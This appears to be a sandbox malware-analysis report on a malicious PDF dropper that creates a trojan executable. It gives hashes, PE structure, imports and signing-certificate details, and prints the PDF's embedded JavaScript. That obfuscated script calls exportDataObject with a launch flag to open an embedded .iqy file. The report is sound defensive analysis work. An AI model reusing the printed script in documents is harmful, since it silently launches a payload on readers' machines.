VTI SCORE: 100/100
Dynamic Analysis Report |
Classification: Trojan, Dropper, Downloader |
2c5729e17b64cd4e905ccfeabbc913ed945e17625c35ec1d6932194aae83d7c6 (SHA256)
DOC_443353149786_10082018.pdf
PDF Document
Created at 2018-08-10 12:36:00
Notifications (2/2)
The overall sleep time of all monitored processes was truncated from "20 minutes, 15 seconds" to "2 minutes" to reveal dormant functionality.
The operating system was rebooted during the analysis.
This is a filtered view
This list contains only the embedded files and created files
Filters: |
There are no files for this filter
Filename | Category | Type | Severity | Actions |
---|
C:\Users\BMe1N39jU1 6criBQ\AppData\Local\Temp\cmd_.exe | Created File | Binary |
Blacklisted
|
...
|
»
File Reputation Information
»
Severity |
Blacklisted
|
First Seen | 2018-08-10 10:35 (UTC+2) |
Last Seen | 2018-08-10 13:00 (UTC+2) |
Names | Win32.Trojan.Wonton |
Families | Wonton |
Classification | Trojan |
PE Information
»
Image Base | 0x400000 |
Entry Point | 0x407209 |
Size Of Code | 0x11600 |
Size Of Initialized Data | 0x6600 |
File Type | executable |
Subsystem | windows_gui |
Machine Type | i386 |
Compile Timestamp | 2018-08-09 13:23:42+00:00 |
Sections (5)
»
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x401000 | 0x11581 | 0x11600 | 0x400 | cnt_code, mem_execute, mem_read | 6.66 |
.rdata | 0x413000 | 0x31d4 | 0x3200 | 0x11a00 | cnt_initialized_data, mem_read | 5.2 |
.data | 0x417000 | 0x54e0 | 0x1600 | 0x14c00 | cnt_initialized_data, mem_read, mem_write | 4.71 |
.rsrc | 0x41d000 | 0x1b4 | 0x200 | 0x16200 | cnt_initialized_data, mem_read | 5.11 |
.reloc | 0x41e000 | 0x1a12 | 0x1c00 | 0x16400 | cnt_initialized_data, mem_discardable, mem_read | 4.56 |
Imports (3)
»
KERNEL32.dll (71)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GlobalAlloc | 0x0 | 0x413008 | 0x15b6c | 0x1456c | 0x2b3 |
GlobalFree | 0x0 | 0x41300c | 0x15b70 | 0x14570 | 0x2ba |
GetTickCount | 0x0 | 0x413010 | 0x15b74 | 0x14574 | 0x293 |
GetSystemTime | 0x0 | 0x413014 | 0x15b78 | 0x14578 | 0x277 |
CreateDirectoryW | 0x0 | 0x413018 | 0x15b7c | 0x1457c | 0x81 |
Sleep | 0x0 | 0x41301c | 0x15b80 | 0x14580 | 0x4b2 |
LoadLibraryW | 0x0 | 0x413020 | 0x15b84 | 0x14584 | 0x33f |
GetLastError | 0x0 | 0x413024 | 0x15b88 | 0x14588 | 0x202 |
lstrcatW | 0x0 | 0x413028 | 0x15b8c | 0x1458c | 0x53f |
lstrcpyW | 0x0 | 0x41302c | 0x15b90 | 0x14590 | 0x548 |
CloseHandle | 0x0 | 0x413030 | 0x15b94 | 0x14594 | 0x52 |
CreateFileW | 0x0 | 0x413034 | 0x15b98 | 0x14598 | 0x8f |
WriteConsoleW | 0x0 | 0x413038 | 0x15b9c | 0x1459c | 0x524 |
lstrlenW | 0x0 | 0x41303c | 0x15ba0 | 0x145a0 | 0x54e |
MultiByteToWideChar | 0x0 | 0x413040 | 0x15ba4 | 0x145a4 | 0x367 |
GetProcAddress | 0x0 | 0x413044 | 0x15ba8 | 0x145a8 | 0x245 |
GetModuleHandleW | 0x0 | 0x413048 | 0x15bac | 0x145ac | 0x218 |
ExitProcess | 0x0 | 0x41304c | 0x15bb0 | 0x145b0 | 0x119 |
DecodePointer | 0x0 | 0x413050 | 0x15bb4 | 0x145b4 | 0xca |
HeapFree | 0x0 | 0x413054 | 0x15bb8 | 0x145b8 | 0x2cf |
EncodePointer | 0x0 | 0x413058 | 0x15bbc | 0x145bc | 0xea |
GetSystemTimeAsFileTime | 0x0 | 0x41305c | 0x15bc0 | 0x145c0 | 0x279 |
GetCommandLineA | 0x0 | 0x413060 | 0x15bc4 | 0x145c4 | 0x186 |
HeapSetInformation | 0x0 | 0x413064 | 0x15bc8 | 0x145c8 | 0x2d3 |
GetStartupInfoW | 0x0 | 0x413068 | 0x15bcc | 0x145cc | 0x263 |
TerminateProcess | 0x0 | 0x41306c | 0x15bd0 | 0x145d0 | 0x4c0 |
GetCurrentProcess | 0x0 | 0x413070 | 0x15bd4 | 0x145d4 | 0x1c0 |
UnhandledExceptionFilter | 0x0 | 0x413074 | 0x15bd8 | 0x145d8 | 0x4d3 |
SetUnhandledExceptionFilter | 0x0 | 0x413078 | 0x15bdc | 0x145dc | 0x4a5 |
IsDebuggerPresent | 0x0 | 0x41307c | 0x15be0 | 0x145e0 | 0x300 |
GetCPInfo | 0x0 | 0x413080 | 0x15be4 | 0x145e4 | 0x172 |
InterlockedIncrement | 0x0 | 0x413084 | 0x15be8 | 0x145e8 | 0x2ef |
InterlockedDecrement | 0x0 | 0x413088 | 0x15bec | 0x145ec | 0x2eb |
GetACP | 0x0 | 0x41308c | 0x15bf0 | 0x145f0 | 0x168 |
GetOEMCP | 0x0 | 0x413090 | 0x15bf4 | 0x145f4 | 0x237 |
IsValidCodePage | 0x0 | 0x413094 | 0x15bf8 | 0x145f8 | 0x30a |
TlsAlloc | 0x0 | 0x413098 | 0x15bfc | 0x145fc | 0x4c5 |
TlsGetValue | 0x0 | 0x41309c | 0x15c00 | 0x14600 | 0x4c7 |
TlsSetValue | 0x0 | 0x4130a0 | 0x15c04 | 0x14604 | 0x4c8 |
TlsFree | 0x0 | 0x4130a4 | 0x15c08 | 0x14608 | 0x4c6 |
SetLastError | 0x0 | 0x4130a8 | 0x15c0c | 0x1460c | 0x473 |
GetCurrentThreadId | 0x0 | 0x4130ac | 0x15c10 | 0x14610 | 0x1c5 |
InitializeCriticalSectionAndSpinCount | 0x0 | 0x4130b0 | 0x15c14 | 0x14614 | 0x2e3 |
DeleteCriticalSection | 0x0 | 0x4130b4 | 0x15c18 | 0x14618 | 0xd1 |
LeaveCriticalSection | 0x0 | 0x4130b8 | 0x15c1c | 0x1461c | 0x339 |
EnterCriticalSection | 0x0 | 0x4130bc | 0x15c20 | 0x14620 | 0xee |
WriteFile | 0x0 | 0x4130c0 | 0x15c24 | 0x14624 | 0x525 |
GetStdHandle | 0x0 | 0x4130c4 | 0x15c28 | 0x14628 | 0x264 |
GetModuleFileNameW | 0x0 | 0x4130c8 | 0x15c2c | 0x1462c | 0x214 |
HeapCreate | 0x0 | 0x4130cc | 0x15c30 | 0x14630 | 0x2cd |
HeapSize | 0x0 | 0x4130d0 | 0x15c34 | 0x14634 | 0x2d4 |
HeapAlloc | 0x0 | 0x4130d4 | 0x15c38 | 0x14638 | 0x2cb |
RaiseException | 0x0 | 0x4130d8 | 0x15c3c | 0x1463c | 0x3b1 |
GetModuleFileNameA | 0x0 | 0x4130dc | 0x15c40 | 0x14640 | 0x213 |
FreeEnvironmentStringsW | 0x0 | 0x4130e0 | 0x15c44 | 0x14644 | 0x161 |
WideCharToMultiByte | 0x0 | 0x4130e4 | 0x15c48 | 0x14648 | 0x511 |
GetEnvironmentStringsW | 0x0 | 0x4130e8 | 0x15c4c | 0x1464c | 0x1da |
SetHandleCount | 0x0 | 0x4130ec | 0x15c50 | 0x14650 | 0x46f |
GetFileType | 0x0 | 0x4130f0 | 0x15c54 | 0x14654 | 0x1f3 |
QueryPerformanceCounter | 0x0 | 0x4130f4 | 0x15c58 | 0x14658 | 0x3a7 |
GetCurrentProcessId | 0x0 | 0x4130f8 | 0x15c5c | 0x1465c | 0x1c1 |
LCMapStringW | 0x0 | 0x4130fc | 0x15c60 | 0x14660 | 0x32d |
GetStringTypeW | 0x0 | 0x413100 | 0x15c64 | 0x14664 | 0x269 |
RtlUnwind | 0x0 | 0x413104 | 0x15c68 | 0x14668 | 0x418 |
SetFilePointer | 0x0 | 0x413108 | 0x15c6c | 0x1466c | 0x466 |
GetConsoleCP | 0x0 | 0x41310c | 0x15c70 | 0x14670 | 0x19a |
GetConsoleMode | 0x0 | 0x413110 | 0x15c74 | 0x14674 | 0x1ac |
HeapReAlloc | 0x0 | 0x413114 | 0x15c78 | 0x14678 | 0x2d2 |
IsProcessorFeaturePresent | 0x0 | 0x413118 | 0x15c7c | 0x1467c | 0x304 |
SetStdHandle | 0x0 | 0x41311c | 0x15c80 | 0x14680 | 0x487 |
FlushFileBuffers | 0x0 | 0x413120 | 0x15c84 | 0x14684 | 0x157 |
USER32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
wsprintfW | 0x0 | 0x413128 | 0x15c8c | 0x1468c | 0x333 |
ADVAPI32.dll (1)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
RegEnumKeyW | 0x0 | 0x413000 | 0x15b64 | 0x14564 | 0x250 |
Digital Signatures (2)
»
Certificate: CINECTIC LIMITED
»
Issued by | CINECTIC LIMITED |
Parent Certificate | thawte SHA256 Code Signing CA |
Country Name | GB |
Valid From | 2017-10-31 00:00:00+00:00 |
Valid Until | 2018-10-31 23:59:59+00:00 |
Algorithm | sha256_rsa |
Serial Number | B3 08 2B 6F C3 F7 DE 00 A2 E2 68 B0 71 5F 76 3 |
Thumbprint | BB 58 21 0B 6A B0 99 55 19 3C EA 32 89 40 A6 05 9F 49 B9 48 |
Certificate: thawte SHA256 Code Signing CA
»
Issued by | thawte SHA256 Code Signing CA |
Country Name | US |
Valid From | 2013-12-10 00:00:00+00:00 |
Valid Until | 2023-12-09 23:59:59+00:00 |
Algorithm | sha256_rsa |
Serial Number | 71 A0 B7 36 95 DD B1 AF C2 3B 2B 9A 18 EE 54 CB |
Thumbprint | D0 0C FD BF 46 C9 8A 83 8B C1 0D C4 E0 97 AE 01 52 C4 61 BC |
C:\Users\BMe1N39jU1 6criBQ\Desktop\DOC_443353149786_10082018.pdf | Sample File |
Unknown
|
...
|
»
PDF Information
»
Title | - |
Subject | - |
Author | - |
Creator | - |
Keywords | - |
Producer | iTextSharp™ 5.5.10 ©2000-2016 iText Group NV (AGPL-version) |
Page Count | 1 |
Encrypted | |
Create Time | 2018-08-10 11:50:18+00:00 |
Modify Time | 2018-08-10 11:50:18+00:00 |
Embedded JavaScript (2)
»
function rfunc900(){
var hadapet = {};hadapet['nLaunch'] = 2;
hadapet['cName'] = '10082016.iqy';
hadapet['r2'] = 'exportDataObject';
this[hadapet['r2']](hadapet);}
rfunc900();
bea0276c51bd6dbccb64110a8655fd623cbb9ebf6e0105c57f62e53e209361b6 | Embedded File | Text |
Unknown
|
...
|
»